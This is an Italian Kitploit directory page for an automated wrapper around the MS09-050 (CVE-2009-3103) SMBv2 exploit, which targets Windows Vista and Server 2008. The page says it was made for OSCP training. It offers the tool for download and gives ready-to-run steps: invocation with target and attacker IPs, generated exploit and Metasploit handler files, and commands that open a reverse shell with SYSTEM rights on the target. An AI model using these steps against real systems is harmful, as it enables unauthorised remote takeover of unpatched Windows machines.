Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ms09-050-CVE-2009-3103-exploit — Wrapper automatico di exploit per MS09-050 (CVE-2009-3103) che prende di mira SMBv2 su Windows Vista/Server 2008. Genera shellcode, costruisce l'exploit e crea un handler Metasploit per l'accesso alla shell SYSTEM. | Kitploit
Strumenti/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingApprendimento e Formazione
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Wrapper automatico di exploit per MS09-050 (CVE-2009-3103) che prende di mira SMBv2 su Windows Vista/Server 2008. Genera shellcode, costruisce l'exploit e crea un handler Metasploit per l'accesso alla shell SYSTEM.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
28 mesi faNon ancora revisionato
Condividi

Wrapper per Exploit MS09-050 SMBv2

Setup in una riga per lo sfruttamento di MS09-050 (CVE-2009-3103). Senza problemi, senza debug, funziona e basta.

Perché?

La maggior parte degli script MS09-050 in circolazione richiedono l'iniezione manuale di shellcode, hanno problemi di temporizzazione con gli handler, o semplicemente non funzionano. Questo wrapper:

  • Genera lo shellcode con i parametri corretti
  • Costruisce l'exploit automaticamente
  • Crea un handler Metasploit pronto all'uso
  • Ti dice esattamente cosa eseguire

Realizzato per la preparazione OSCP dove il tempo conta.

Target

  • Vulnerabilità: MS09-050 / CVE-2009-3103
  • Interessati: Windows Vista SP1/SP2, Windows Server 2008 (pre R2)
  • Servizio: SMBv2 sulla porta 445
  • Risultato: shell SYSTEM

Requisiti

  • Kali Linux (o qualsiasi distribuzione con Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (di solito preinstallato)
  • Utilizzo

    root@kitploit:~
    ./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
    

    Esempio

    root@kitploit:~
    ./ms09_050.sh 192.168.233.40 192.168.45.232 443
    

    Output:

    root@kitploit:~
    [*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
    [*] Generating shellcode...
    [+] Files created:
        - exploit.py
        - handler.rc
    
    === RUN ===
    
    Terminal 1:  msfconsole -q -r handler.rc
    Terminal 2:  python2 exploit.py 192.168.233.40
    

    Esecuzione

    1. Terminal 1 - Avvia l'handler:

      root@kitploit:~
      msfconsole -q -r handler.rc
      

      Attendi: Started reverse TCP handler on ...

    2. Terminal 2 - Esegui l'exploit:

      root@kitploit:~
      python2 exploit.py 192.168.233.40
      
    3. Controlla Terminal 1 per la tua shell.

    Note

    • Utilizza payload staged (windows/shell/reverse_tcp) - funziona in modo affidabile con lo stager in questo exploit
    • Se l'exploit fallisce, il target potrebbe aver bisogno di un riavvio o non essere vulnerabile
    • Porta 443 raccomandata se 4444 è filtrata

    Crediti

    Exploit originale basato su MS09-050 PoC di ohnozzy.

    Licenza

    MIT - Fai quello che vuoi, purché non sia male.

    Scarica lo strumento